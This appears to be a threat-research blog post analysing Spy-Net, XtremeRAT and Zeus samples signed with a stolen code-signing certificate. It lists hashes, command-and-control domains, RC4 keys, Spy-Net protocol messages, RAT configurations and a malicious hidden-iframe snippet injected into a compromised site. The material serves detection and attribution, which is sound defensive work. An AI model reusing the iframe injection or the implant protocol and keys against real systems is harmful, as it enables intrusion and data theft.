Malware authors are always looking for new ways to masquerade their
actions. Attackers are looking for their malware to be not only fully
undetectable, but also appear valid on a system, so as not to draw
attention. Digital signatures are one way malware authors keep under
the radar. Digital signatures are an easy, quick way to verify the
authenticity of an application utilizing the signature.
Threat actors routinely steal digital signing certificates to hide in
plain sight. There are recent reports of banking Trojans href="https://blogs.comodo.com/e-commerce/comodo-av-labs-id-zeus-trojan/">such
as Zeus, using valid signatures to get past both automated and
human defenses. Part of performing accurate threat intelligence is
continually looking to the past to help better predict the future.
This is proven in the samples we will be discussing in this blog. Many
of the samples throughout this blog are from the summer of 2013. These
particular samples however, piqued our interest because of the mass
distribution of RATs in a particular targeted region. It also reminded
us of a recent href="/content/fireeye-www/en_US/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html">XtremeRAT
blog we published earlier in 2014.
The Little Signature That Could
While investigating an uptick in Spy-Net spam campaigns, we came
across a malware binary that was digitally signed that struck our
interest. Spy-Net allows an attacker to interact with the victim via a
remote shell to upload/download files, interact with the registry,
running processes and services as well as capture images of the
desktop and record form the webcam and audio. It also contains
functionality to extract saved passwords and turn the victim into a
proxy server. During the build process, an attacker can choose to
enable a keylogger and evasion functionality designed to stop the
information process if a debugger or virtual machine is found.
We noticed that one of the Spy-Net binary files, sc2.exe (MD5:
6a56f6735f4b16a60f39b18842fd97d0), upon closer inspection, was
utilizing a valid digital signature, from a company called CZ Solution
Co. Ltd.
Figure 1: Signature Details of sc2.exe
Looking closer at the signature, we noticed that all of the details
were intact, and appeared to be valid. There are two additional
code-signing certificates issued to CZ Solution Co. Ltd.
Figure 2: Additional Signature Details
Investigation of sc2.exe showed typical Spy-Net behaviors. The sample
beaconed out to ekinox.no-ip.info. From here, we decided to
pivot off the CZ Solution signature and see what we could find.
Connections Emerge
As we started to pivot off the CZ Solution signature, we started to
see some interesting commonalities. Pivoting proved that the CZ
Solution signature was not just used in Spy-Net binaries. We quickly
found that this signature was being used with XtremeRAT, a popular RAT
that cybercriminals and targeted attackers use regularly. The code of
XtremeRAT is shared amongst several other Delphi RAT projects
including Spy-Net, CyberGate, and Cerberus.
XtremeRAT allows an attacker to:
One binary for instance, m.exe (MD5:
c27232691dacf4cff24a4d04b3b2896b) which was XtremeRAT, was seen
beaconing out to http://omegaphotography.[co].uk,
batardchris.servehttp.com /1234567890.functions, and www.batteurmag.com/[plugin].xtr.
Likewise, we saw multiple samples of the Zeus Trojan utilizing the CZ
Solution signature. Zeus modifiers can tune Zeus to steal information
they are interested in; typically login credentials for title="Social network"
href="https://en.wikipedia.org/wiki/Social_network">online social
networks, href="https://en.wikipedia.org/wiki/E-mail_account">e-mail
accounts, href="https://en.wikipedia.org/wiki/Online_banking">online
banking or other online financial services. Zeus is commonly seen
targeting customers of financial institutions.
One of the Zeus samples, uk.exe (MD5:
dcd3e45d40c8817061f716557e7a05b6) that was utilizing the CZ Solution
signature, was beaconing out to claire-morin.com/file.php.
Looking at the three samples show that CZ Solution was used to create
and sign Spy-Net, XtremeRAT, and Zeus samples. Graphing out the
connections between the samples we profiled, you can quickly see how
fast this web of similarities continue.
class="aligncenter size-full wp-image-5958 landscape-lg" alt="cz3"
src="https://www.fireeye.com/content/dam/legacy/blog/2014/07/cz3.png"
width="1047" height="304" />Figure 3: Connection Profile of
Binaries Using CZ Solution
The French Connection and C2 overlap
Attribution of actors and/or campaigns can often be a difficult and
tedious task. However, since we were dealing with so many
inter-twining binaries, we could start to draw some parallels between samples.
When looking at the overall connections between the CZ solution
signature, you can start to see a trend emerge. First, there is some
C2 overlap. For instance Dllsv.exe (MD5:
3f042fd6b9ce7e23b3c84c6f7323dd75) communicates out to
ekinox.no-ip.info, using the same CZ Solution cert. This malware is
flagged as BozokRAT; a user-friendly RAT that can upload and download
files to and from a computer, modify registry entries, and perform
other typical RAT functions. That same C2, ekinox.no-ip.info, is also
seen used by the aforementioned Spy-Net binary, sc2.exe (MD5: 6a56f6735f4b16a60f39b18842fd97d0).
In another example of C2 overlap, a file named uk.exe, (MD5:
9c11ef09131a3373eef5c9d83802d56b) uses its C2 as
omega-photography.co.uk. This sample is an active Zeus binary. That
same C2 is used with a file named x.exe, (MD5:
c27232691dacf4cff24a4d04b3b2896b), an active XtremeRAT binary.
Next, we needed to identify at least one infection vector to ensure
we could track how one of the binaries using the CZ Solution signature
was getting into environments.
In one case, we found the infection vector for an XtremeRAT binary
that was using the CZ Solution certificate. The binary came in the
form of phished email (MD5: 7c00ba0fcbfee6186994a8988a864385)
purportedly from Armani regarding an order.
The email was in French and the headers
were interesting, as the same sender has been href="http://www.projecthoneypot.org/ip_212.227.126.130">seen in
multiple French spam runs.
The attachment in the email is using the href="http://blog.malwarebytes.org/online-security/2014/01/the-rtlo-method/">RTLO
trick to disguise a 7zip file as a PDF.
While looking at the all the samples we correlated and pivoted off
of, we found that a majority of both the language and C2’s being used
all revolved around the French language. The domains that were part of
the C2 infrastructure were almost all exclusively French, as was the
registrant information for the domains in question.
Spy-Net C2 Protocol Analysis
As we have already shared some analysis details of XtremeRAT in a href="/content/fireeye-www/en_US/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html">previous
blog, we decided to share some information and tools we built
regarding Spy-Net this time. This information is based on our analysis
of Spy-Net version 2.6 specifically. Other versions of Spy-Net may
have significant changes to the protocol. Spy-Net 2.6 utilizes a
homegrown protocol like many other publicly available RATs. It’s an
ASCII based, pipe-delimited protocol utilizing Portuguese keywords
that employs two totally different forms of obfuscation: one for
outbound communication to the attacker and another for inbound
communication to the implant. The outbound communications are
compressed with zlib and encrypted with RC4. The RC4 key is hard-coded
and is updated with version changes. For example, the RC4 key for
Spy-Net 2.6 is njkvenknvjebcddlaknvfdvjkfdskv, while for
CyberGate 1.07, which has a similar (if not the same) protocol the key
is njgnjvejvorenwtrnionrionvironvrnvcg107 and CyberGate 1.18’s
key is njgnjvejvorenwtrnionrionvironvrnvcg117.
The astute reader may have noticed that the last three numbers of the
CyberGate keys (roughly) represent the version number of CyberGate.
The inbound communication to the implant employs an ASCII encoding
scheme similar to Base64. This protocol begins with a simple
authentication scheme where the implant sends an authentication
password that is validated by the client. This password is
configurable by the attacker and defaults to abcd1234. The
implant then proceeds to send the entirety of its configuration
information, as configured by the attacker, to the client so it can be
displayed on its “Configuration” tab.
Authentication
Implant->Client: mypassword|Y|
Configuration Request and Response
Client->Implant: configuracoesdoserver|
Implant->Client:
configuracoesdoserver|configuracoesdoserver|192.168.1.2:81|#myID|mypassword|C:\WINDOWS\install\server.exe|C:\Program
Files\Internet Explorer\iexplore.exe| |
|{0OP8GNN1-GIWW-CC7M-AJ0I-6Y554UOJJ241}|Policies|FALSE|TRUE|TRUE|TRUE|***MUTEX***|
| |TRUE|FALSE| | | | | | |FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|server.exe#crack.exe#|FALSE|
The outbound communications from the implant to the client are
prepended with an ASCII representation of the length of the payload
followed by a pipe character and a new line character.
There is a noticeable lack of
sophistication in Spy-Net’s code. For example, in some cases the
length indicator is followed by a pipe and a single new line (\n)
character as seen in *nix based operating systems. In other cases, the
indicator is followed by the carriage return and new line characters
(\r\n), as seen in Windows operating systems. This lack of conformity
is also witnessed in how there are two totally different schemes used
for obfuscation, and in how obfuscation is not used for file transfers
as it is otherwise used throughout the protocol.
Spy-Net Protocol Decoder
Since Spy-Net is a publicly available RAT that we see in use quite
often, we decided to build a ChopShop module for it and share it in
cooperation with our friends at MITRE. The module is now available as
a standard part of the framework href="https://github.com/MITRECND/chopshop">available on GitHub.
We are also sharing a href="https://github.com/fireeye/pycommands">Spy-Net configuration
dumping pycommand for Immunity Debugger. While hunting for
related samples in VirusTotal, we came across a pcap that had captured
the initial infection and subsequent communication of the Spy-Net
binary we initially mentioned, (MD5:
6a56f6735f4b16a60f39b18842fd97d0). This gave us a great opportunity to
test our new decoder. One thing that Spy-Net implants will commonly
send out automatically is a thumbnail image of the user’s desktop.
This is displayed on the client.
Our decoder can extract such images from
the pcap and what we found gave us a further hint that we may be
dealing with attacks focused in France. Although difficult to read due
to the very low resolution of the thumbnail, our pcap decoder was able
to tell us that the title of the browser window currently open in this
screenshot is “Football - MAXIFOOT l'actualit foot et transfert -
Windows Internet Explorer.”
Distribution via Malicious Java Applet
According to the details of the pcap we decoded, this French football
Web site (maxifoot.fr) was apparently compromised and had an iframe
inserted into it that pointed to another compromised Web site, a
Canadian addiction recovery resource: unwasted.ca.
<iframe width="1px" height="1px"
src="hxxp://unwasted.ca/skins/index.html"
style="display: block;" ></iframe>
The latter site hosted a malicious Java applet that downloaded the
Pony/Fareit malicious downloader. The downloader then proceeded to
install ZeuS and download and execute the aforementioned Spy-Net
binary. All of these binaries were signed with the stolen digital
certificate. The malicious Java applet used to install the Pony
downloader was created by Foxxy Software and had been previously href="http://www.welivesecurity.com/2012/08/07/foxxy-software-outfoxed/">written
about by ESET.
RAT Configuration Details
We assembled a compilation of the meaningful configuration data found
in the XtremeRAT and Spy-Net samples we came across in our analyses.
You can observe some similarities between the samples’ configurations.
MD5 |
Version |
Dir/Path |
ID |
Group |
Mutex |
Password |
f5e6c0a2c9000311513521947a76cb4b |
Spy-Net 2.6 |
C:\WINDOWS\system32\conhost\conhost.exe |
Updater2014 |
NA |
R5438NM5 |
abcd1234 |
6a56f6735f4b16a60f39b18842fd97d0 |
Spy-Net 2.6 |
C:\WINDOWS\system32\Winini\taskhost.exe |
Uframer |
NA |
A7TF5W |
abcd1234 |
7416ec2889227f046f48c15c45c102da |
XtremeRAT 3.5 Private |
InstallDir |
SpaM |
SPAM |
eyA8znpc |
NA |
2e776e18dec61cf6ccd68fbacd55fab3 |
XtremeRAT 3.5 Private |
svhost |
Diesel |
Diesel |
lNFAH0 |
NA |
be47ec66d861c35784da527bf0f2e03a |
XtremeRAT 3.5 Private |
svhost |
IdSec |
USA3 |
lNFAH0 |
NA |
c27232691dacf4cff24a4d04b3b2896b |
XtremeRAT 3.5 Private |
InstallDir |
IdSec |
idsection |
eyA8znpc |
NA |
e79636e4c7418544d188a29481c100bb |
XtremeRAT 3.5 Private |
svhost |
IdSec |
USA3 |
lNFAH04 |
NA |
bd70a7cae3ebf85cf1edd9ee776d8364 |
XtremeRAT 3.5 Private |
svhost |
IdSec |
IdSec |
lNFAH0 |
NA |
0be3b0e296be33903bf76b8cd9cf52ca |
XtremeRAT 3.5 Private |
svhost |
CiTa |
IdSec |
x4KybsbM |
NA |
Conclusion
The usage of digital signatures isn’t going to decrease anytime soon-
especially by threat actors. It gives them a quick, easy way to bypass
traditional security controls since certificates and signatures are
typically trusted by default. In this blog, we are shown that this
trend still true. We looked towards the past in this blog, to better
understand motivations and trends going forward. We can accurately
say, based on the information attributed, that the CZ Solution
signatures were being utilized by an individual or group of
individuals using French assets and infrastructure.
These particular actors didn’t show a significant level of expertise,
but did show collective resources with knowledge in at least Zeus,
Spy-Net, and XtremeRAT. We can say accurately that it is likely these
actor(s) were using the same signature to send out a wide range of
binaries, possibly even outside of the realm of the four families
discussed here. As we wrote this blog, we couldn’t help but be
reminded of the spam run focused in Colombia and Central America that
we href="/content/fireeye-www/en_US/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html">wrote
about back in February of this year. A spam run that is
regionally focused, but with no apparent targeting in nature,
utilizing a mix of ZeuS and off-the-shelf RATs.
Helping protect your organization from threats using valid digital
signatures can include verification of the signature’s serial number.
In this case, the serial number: 6e 7b 63 95 ac 5b 5c 8a 2a ec c4 52
8d 9e 65 10, is the identifier to locate in regards to this publisher.
Also, if you’re running your own internal certificate authority,
ensure you are adequately revoking certificates that may have been
compromised. This will help ensure compromised certificates are not
utilized in attacks.